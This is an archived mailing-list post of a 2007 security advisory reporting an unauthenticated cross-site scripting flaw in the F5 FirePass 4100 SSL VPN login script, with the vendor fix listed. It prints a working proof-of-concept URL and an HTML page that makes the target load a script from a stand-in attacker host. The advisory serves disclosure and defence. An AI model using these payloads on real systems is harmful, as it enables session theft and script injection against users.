Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

PR07-15: Cross-site Scripting (XSS) / HTML injection on F5 FirePass 4100

from [research] Network Security [Permanent Link]
Subject: PR07-15: Cross-site Scripting (XSS) / HTML injection on F5 FirePass 4100 SSL VPN 'my.logon.php3' server-side script
Date: 30 Nov 2007 11:50:04 -0000 
PR07-15: Cross-site Scripting (XSS) / HTML injection on F5 FirePass 4100 SSL 
VPN 'my.logon.php3' server-side script

Date Found: 19th June 2007

Successfully tested on: version 5.5.2

F5 Networks has confirmed the following versions to be vulnerable:

FirePass versions 5.4.1 - 5.5.2
FirePass versions 6.0 - 6.0.1


Description:

F5 Networks FirePass 4100 SSL VPN is vulnerable to XSS within the 
"my.logon.php3" server-side script.

No authentication is required to exploit this vulnerability.


Consequences:

An attacker may be able to cause execution of malicious scripting code in the 
browser of a user who visits a specially-crafted URL to an F5 Firepass device, 
or visits a malicious page that makes a request to such URL. Such code would 
run within the security context of the target domain.

This type of attack can result in non-persistent defacement of the target site, 
or the redirection of confidential information (i.e. admin session IDs) to 
unauthorised third parties. 


Proof of concept (PoC) URL:

https://target.tld/my.logon.php3?";></script><textarea>HTML_injection_test</textarea><!--

The payload in the example is 

"></script><textarea>HTML_injection_test</textarea><!--

which injects a 'textarea' box


The following PoC HTML page would run JavaScript without any restrictions from 
a third-party file ('http://www.evil.foo/b' in this case):

<html>

<iframe 
src="https://target.tld/my.logon.php3?%22%3E%3C/script%3E%3Cscript%3Eeval%28name%29%3C/script%3E%3C%21--";
 width="0%" height="0%" 
name="xss=document.body.appendChild(document.createElement('script'));xss.setAttribute('src','http://www.evil.foo/b')"></iframe>

</html>



Successfully tested on:

Server environment:

F5 FirePass 4100

Client environment:

Microsoft Internet Explorer 7.0.5730.11


Severity: Medium/High


Author: Richard Brain of ProCheckUp Ltd (www.procheckup.com)

With thanks to Petko D. Petkov for suggesting the eval(name) technique.


References:

http://www.procheckup.com/Vulnerability_2007.php
http://www.f5.com/products/FirePass/


ProCheckUp thanks F5 Networks for working with us.


Fix:

F5 Networks has issued SOL7923:

https://support.f5.com/kb/en-us/solutions/public/7000/900/SOL7923.html?sr=1
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • PR07-15: Cross-site Scripting (XSS) / HTML injection on F5 FirePass 4100 SSL VPN 'my.logon.php3' server-side script, research <=
Previous by Date:  PR07-14: Cross-site Scripting (XSS) / HTML injection on F5 FirePass 4100 SSL VPN 'my.activation.php3' server-side script, research
Next by Date:  Re: Aria-Security.net: CoolShot E-Lite POS 1.0, coolshot
Previous by Thread:  PR07-14: Cross-site Scripting (XSS) / HTML injection on F5 FirePass 4100 SSL VPN 'my.activation.php3' server-side script, research
Next by Thread:  27Mhz based wireless security insecurities - Aka - "We know what you typed last summer", Max Moser
Indexes:  [Date] [Thread] [Top] [All Lists]